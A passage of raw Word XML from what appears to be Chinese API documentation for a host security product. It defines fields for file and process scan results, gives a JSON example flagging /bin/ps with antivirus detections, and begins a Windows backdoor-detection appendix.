            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A02FA12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F405B01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AFFA0EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="020AA6F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>changeTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB3C25E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2434874A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E36E519" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件change time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DECF8C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BCDDB25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535D110D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34640E3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D833749" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件change time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4BAE5C83" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77101373" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accessTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC70EF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75964B62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21D6E225" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="133DCFF7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1FFAD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E6B724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="720C99FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687CB522" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52C53171" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="455FFED0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBF415D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A3B516B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30AF5E66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B26DAC3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72069357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="014F61E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D6B809B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0031A22A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4212C281" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA3127A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>codeSectionMd5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4708BDE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356A580E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC0E4B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51F13CA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BCA507" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>codeSectionSha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3413F967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D53A18E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C69CD2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2877B42E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB0651A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>codeSectionSha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40236425" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28C5C725" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467598E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13480F85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>进程信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2143"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="23E31B4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E882DBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594FB65A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62137CDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20A98F17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="27CAFE1C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9B50C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1376F382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55687673" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23950AC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34712267" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31834A25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>processPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C03C58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD7B9B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47FC485E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程对应执行文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52294A39" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7341A49A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentProcessName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3854AA52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2316E7BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C49F8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AE49C76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1511456D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52A11C78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09CE1870" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="428C494B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F532904" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4459699A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">{  \"uname\" : \"root\",  \"processPath\" : \"/bin/ps\",  \"parentProcessName\" : \"bash\",  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>\"parentPath\" : \"/bin/bash\",  \"path\" : \"/bin/ps\",  \"size\" : 1223123,  \"type\" : \"regular file\",  \"user\" : \"root\",  \"group\" : \"root\",  \"permission\" : \"0755\",  \"changeTime\" : 1545633340,  \"modifyTime\" : 1545633340,  \"accessTime\" : 1545806233,  \"md5\" : \"1e6237ef30bc132155cdc3a39ad29d71\",  \"sha1\" : \"9e0fc9af130255fdd42d70ca9aea4dfff8a3b46b\",  \"sha256\" : \"d63afb1cdaa6b354c4dbafc75e1b146e1d79152f58d725b3208070282d4a70b8\",  \"codeSectionMd5\" : null,  \"codeSectionSha1\" : null,  \"codeSectionSha256\" : null,  \"ruleResults\" : [ {    \"virusName\" : \"LINUX/Setag.ztrec\",    \"virusDescription\" : \"Contains detection pattern of the Linux virus LINUX/Setag.ztrec\",    \"libUpdateTime\" : 1534953600,    \"libName\" : \"Avira\",    \"virusInstruct\" : null  }, {    \"virusName\" : \"Unix.Malware.Agent-1407158\",    \"virusDescription\" : null,    \"libUpdateTime\" : 1537169743,    \"libName\" : \"clamAV\",    \"virusInstruct\" : null  }, {    \"virusName\" : \"tezheng\",    \"virusDescription\" : \"\",    \"libUpdateTime\" : 0,    \"libName\" : \"青藤库\",    \"virusInstruct\" : null  } ]}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535090B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="附录2-windows后门检测-查询结果-data数据结构"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录2 Windows后门检测-查询结果-data数据结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA8CB81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="后门类型可疑进程"/>
      <w:r>
        <w:t>后门类型：可疑进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93EBE8"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1041"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2704"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0FA0EEE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1CDE72B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232A25D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F9FB40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2899CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F42FC41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF97B45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFAC2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B0E6B42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5335BA90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F3C3CF9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57D43090" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_msg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0257F42F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033F69D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CB605A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66DAFB3A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04FBFE51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
